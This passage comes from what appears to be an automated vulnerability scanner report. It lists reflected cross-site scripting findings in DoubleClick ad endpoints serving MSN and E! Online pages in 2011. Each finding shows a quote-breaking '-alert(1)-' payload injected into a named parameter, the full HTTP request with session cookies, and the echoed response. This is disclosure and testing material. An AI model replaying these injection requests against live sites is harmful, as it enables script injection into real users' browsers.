get=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f5963932e'-alert(1)-'d56046cbb6f&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhttp://www.progressive.com/insurance/cre/
...[SNIP]...

2.31. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 888e8"-alert(1)-"2bd960de39e was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4888e8"-alert(1)-"2bd960de39e&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:51 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4888e8"-alert(1)-"2bd960de39e&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhtt
...[SNIP]...

2.32. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0dbc'-alert(1)-'91ee00ba731 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4a0dbc'-alert(1)-'91ee00ba731&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:55 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4a0dbc'-alert(1)-'91ee00ba731&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhtt
...[SNIP]...

2.33. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae6c6"-alert(1)-"63551dfc16d was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065ae6c6"-alert(1)-"63551dfc16d&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:33 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
x105.gif";
var minV = 6;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065ae6c6"-alert(1)-"63551dfc16d&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/
...[SNIP]...

2.34. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58044'-alert(1)-'2f8cdfb56d7 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=2124106558044'-alert(1)-'2f8cdfb56d7&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:38 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=2124106558044'-alert(1)-'2f8cdfb56d7&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/
...[SNIP]...

2.35. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f266f"-alert(1)-"4a1f5865200 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-f266f"-alert(1)-"4a1f5865200&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:25 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
lo_interactive_300x105.gif";
var minV = 6;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-f266f"-alert(1)-"4a1f5865200&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B
...[SNIP]...

2.36. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bec24'-alert(1)-'dc373f3b126 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-bec24'-alert(1)-'dc373f3b126&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:29 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-bec24'-alert(1)-'dc373f3b126&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B
...[SNIP]...

2.37. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c35ec"-alert(1)-"5362f34c696 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=c35ec"-alert(1)-"5362f34c696 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5269
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 16:06:07 GMT
Expires: Mon, 09 May 2011 16:06:07 GMT

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=c35ec"-alert(1)-"5362f34c696http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhttp://www.progressive.com/insurance/cre/display.aspx?
...[SNIP]...

2.38. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6e0a'-alert(1)-'5fda209b05 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=a6e0a'-alert(1)-'5fda209b05 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5266
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 16:06:12 GMT
Expires: Mon, 09 May 2011 16:06:12 GMT

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=a6e0a'-alert(1)-'5fda209b05http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhttp://www.progressive.com/insurance/cre/display.aspx?
...[SNIP]...

2.39. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe95a'-alert(1)-'2f8594908bb was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!fe95a'-alert(1)-'2f8594908bb&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:12 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!fe95a'-alert(1)-'2f8594908bb&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B5784509
...[SNIP]...

2.40. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d04f0"-alert(1)-"94981583a31 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!d04f0"-alert(1)-"94981583a31&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:08 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
meyourprice_slider_flo_interactive_300x105.gif";
var minV = 6;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!d04f0"-alert(1)-"94981583a31&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B5784509
...[SNIP]...

2.41. http://ad.doubleclick.net/adj/blog.us.eonline/mm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/blog.us.eonline/mm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21af0'-alert(1)-'f4b60843494 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/blog.us.eonline/mm;tile=3;pos=3_120x60;sz=120x60;akw=;!category=default;name=;title=;ord=2613388469908386?&21af0'-alert(1)-'f4b60843494=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.eonline.com/uberblog/b239302_did_chelsea_handler_have_steal_her_man.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
